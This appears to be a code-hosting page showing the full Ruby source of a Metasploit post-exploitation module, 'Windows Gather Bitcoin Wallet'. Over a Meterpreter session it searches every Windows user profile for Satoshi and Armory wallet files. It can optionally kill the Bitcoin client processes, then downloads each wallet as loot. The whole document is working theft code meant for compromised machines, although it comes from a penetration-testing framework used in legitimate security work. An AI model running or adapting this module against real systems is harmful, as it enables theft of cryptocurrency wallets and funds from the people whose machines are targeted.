Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/post/windows/gather/bitcoin_jacker.rb
Views: 11655
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Post6include Msf::Auxiliary::Report7include Msf::Post::Windows::UserProfiles8include Msf::Post::File910def initialize(info = {})11super(12update_info(13info,14'Name' => 'Windows Gather Bitcoin Wallet',15'Description' => %q{16This module downloads any Bitcoin wallet files from the target17system. It currently supports both the classic Satoshi wallet and the18more recent Armory wallets. Note that Satoshi wallets tend to be19unencrypted by default, while Armory wallets tend to be encrypted by default.20},21'License' => MSF_LICENSE,22'Author' => [23'illwill <illwill[at]illmob.org>', # Original implementation24'todb' # Added Armory support25],26'Platform' => [ 'win' ], # TODO: Several more platforms host Bitcoin wallets...27'SessionTypes' => [ 'meterpreter' ],28'Compat' => {29'Meterpreter' => {30'Commands' => %w[31stdapi_sys_process_get_processes32stdapi_sys_process_kill33]34}35}36)37)3839register_options([40OptBool.new('KILL_PROCESSES', [false, 'Kill associated Bitcoin processes before jacking.', false]),41])42end4344def run45print_status('Checking all user profiles for Bitcoin wallets...')46found_wallets = false47grab_user_profiles.each do |user|48next unless user['AppData']4950bitcoin_wallet_path = user['AppData'] + '\\Bitcoin\\wallet.dat'51next unless file?(bitcoin_wallet_path)5253found_wallets = true54jack_wallet(bitcoin_wallet_path)55armory_wallet_path = user['AppData'] + '\\Armory'56session.fs.dir.foreach(armory_wallet_path) do |fname|57next unless fname =~ /\.wallet/5859found_wallets = true60armory_wallet_fullpath = armory_wallet_path + "\\#{fname}"61jack_wallet(armory_wallet_fullpath)62end63end64unless found_wallets65print_warning 'No wallets found, nothing to do.'66end67end6869def jack_wallet(wallet_path)70data = ''71wallet_type = case wallet_path72when /\.wallet$/73:armory74when /wallet\.dat$/75:satoshi76else77:unknown78end7980if wallet_type == :unknown81print_error "Unknown wallet type: #{wallet_path}, nothing to do."82return83end8485print_status("#{wallet_type.to_s.capitalize} Wallet found at #{wallet_path}")86print_status("Jackin' wallet...")8788kill_bitcoin_processes if datastore['KILL_PROCESSES']8990begin91data = read_file(wallet_path) || ''92rescue ::Exception => e93print_error("Failed to download #{wallet_path}: #{e.class} #{e}")94return95end9697if data.empty?98print_error('No data found, nothing to save.')99else100loot_result = store_loot(101"bitcoin.wallet.#{wallet_type}",102'application/octet-stream',103session,104data,105wallet_path,106"Bitcoin Wallet (#{wallet_type.to_s.capitalize})"107)108print_status("Wallet jacked: #{loot_result}")109end110end111112def kill_bitcoin_processes113client.sys.process.get_processes.each do |process|114pname = process['name'].downcase115next unless pname == 'bitcoin.exe' || pname == 'bitcoind.exe' || pname == 'armoryqt.exe'116117print_status("#{process['name']} Process Found...")118print_status("Killing Process ID #{process['pid']}...")119session.sys.process.kill(process['pid'])120end121end122end123124125